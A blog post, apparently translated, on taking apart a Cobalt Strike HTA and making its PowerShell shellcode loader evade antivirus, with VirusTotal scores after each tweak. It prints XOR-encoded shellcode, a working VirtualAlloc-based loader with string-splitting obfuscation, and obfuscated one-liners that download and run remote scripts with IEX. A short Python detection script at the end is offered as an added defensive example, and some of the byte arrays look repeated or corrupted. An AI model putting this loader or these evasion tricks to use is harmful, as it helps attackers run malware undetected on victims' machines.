21,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,18,13,18,16,17,13,17,17,20,13,17,17,20,35,35,35,35,35)

Now let's upload it to VirusTotal again.

Outrageous: 32/59. I have to say, the security vendors are probably also learning new evasion techniques online every day.

Here I followed Y4er's approach; the main change is renaming the keywords:

Set-StrictMode -Version 2

$DoIt = @'
function func_b {
Param ($amodule, $aprocedure)
$aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods')
$agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure))
}

function func_a {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters,
[Parameter(Position = 1)] [Type] $areturn_type = [Void]
)

$atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed')
$atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')

return $atype_b.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,83,142,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,87,75,26,100,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,24,3,110,98,112,97,10,46,41,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,1
21,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,18,13,18,16,17,13,17,17,20,13,17,17,20,35,35,35,35,35)

for ($x = 0; $x -lt $acode.Count; $x++) {
$acode[$x] = $acode[$x] -bxor 35
}

$ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)

$arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void])))
$arunme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
i`ex $DoIt
}

Let's try VirusTotal once more.

28/60, so only 4 more engines bypassed.
Still too weak; for manual work that is about as far as it goes. Below are some obfuscation tricks for the remote download-and-execute one-liner, for when directly running the command generated by CS gets blocked by AV.

  1. Use Replace to substitute part of a keyword's letters, combined with splitting the string and reassembling it
    powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://0.0.0.0:4545/text.txt'')'.Replace('123','adString');IEX ($c1+$c2)"

  2. Use PowerShell language features to obfuscate the code

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"

Piped standard input:

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

Using environment variables:

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&cmd /c echo %cmd%|powershell -

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ((Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value)

Getting the argument from another process:

cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR https://7ell.me/power)&& FOR /L %i IN (1,1,1000) DO echo"
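Every one-liner above, like the backtick-split ie`x and the 'Inv'+'oke' string splitting in the Y4er variant earlier, still has to reach the PowerShell engine through a process command line, and that is where a defender can match it. The following Python is an added example, not code from the original post or from the article it references: it normalises a command line (dropping the backtick escapes that split a token) and runs a small rule set over it. The command lines it scores are the examples from this page plus two constructed ones (an -encodedcommand launcher in the shape of the HTA's, and a backtick-split IEX); the rule names and the 16-character Base64 threshold are my own choices.

```python
import base64
import re

# Rule set: (name, pattern), applied case-insensitively to the normalised command line.
RULES = [
    ("encoded_command", r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("no_profile", r"-nop(?:rofile)?\b"),
    ("invoke_expression", r"\b(?:iex|invoke-expression)\b"),
    ("iex_string_concat", r"iex\s*\(\s*\$\w+\s*\+\s*\$\w+"),
    ("replace_builds_token", r"\.replace\('[^']*'\s*,\s*'[^']*'\)"),
    ("env_var_to_iex", r"iex\s+\$env:|getenvironmentvariable\(|env:\w+\)\.value"),
    ("stdin_script", r"iex\s+\$input|\|\s*(?:powershell(?:\.exe)?|%\w+%%\w+%)\s+-\s*\"?\s*$"),
    ("split_binary_name", r"%\w+%%\w+%"),
    ("download_cradle", r"net\.webclient|downloadstring|\biwr\b|invoke-webrequest"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]
# A backtick between two letters is PowerShell's escape character used to split a token (i`ex).
BACKTICK_IN_TOKEN = re.compile(r"(?<=[A-Za-z])`(?=[A-Za-z])")


def normalise(cmdline: str) -> str:
    """Remove token-splitting backticks so 'i`ex' is matched as 'iex'."""
    return BACKTICK_IN_TOKEN.sub("", cmdline)


def analyse(cmdline: str) -> list:
    """Return the names of every rule the command line triggers (empty list = clean)."""
    hits = []
    if BACKTICK_IN_TOKEN.search(cmdline):
        hits.append("backtick_obfuscation")
    norm = normalise(cmdline)
    hits.extend(name for name, rx in COMPILED if rx.search(norm))
    return hits


def triage(samples: dict) -> dict:
    """Score a batch of labelled command lines."""
    return {label: analyse(line) for label, line in samples.items()}


# Sample command lines: those from this page plus two constructed ones (encoded, backtick).
ENC = base64.b64encode("Write-Host constructed".encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINES = {
    "baseline": 'cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"',
    "replace_concat": "powershell.exe -nop -w hidden -c \"$c1='IEX(New-Object Net.WebClient).Downlo';"
                      "$c2='123(''http://0.0.0.0:4545/text.txt'')'.Replace('123','adString');IEX ($c1+$c2)\"",
    "echo_pipe": 'cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"',
    "split_name": 'cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"',
    "stdin_var": 'cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"',
    "env_iex": 'cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"',
    "env_getter": "cmd.exe /c \"set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))",
    "encoded": "powershell -nop -w hidden -encodedcommand " + ENC,   # constructed
    "backtick": 'powershell -c "i`ex $DoIt"',                       # constructed
}

if __name__ == "__main__":
    for label, hits in triage(SAMPLE_COMMAND_LINES).items():
        print(f"{label:15s} {'CLEAN' if not hits else ', '.join(hits)}")
```

The baseline line from item 2 scores zero hits while every obfuscated variant of the same Write-Host command trips at least one rule, which is the point: the tricks hide the payload text from a signature, but the launcher shape (hidden window, IEX on a variable, a script fed through stdin or an environment variable, a split executable name) is itself the signal. In production these rules belong on process-creation telemetry (Sysmon event 1 or Windows event 4688 with command-line logging enabled) rather than on a static file.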


Reference:
https://mp.weixin.qq.com/s/TtKEnmUbtVMSqBCgrSj2Qw


Analyzing a Cobalt Strike-generated HTA and PowerShell AV evasion
https://glacierrrr.online/2022/08/16/CS生成hta分析与powershell免杀/
Author: Glacier
Published: 16 August 2022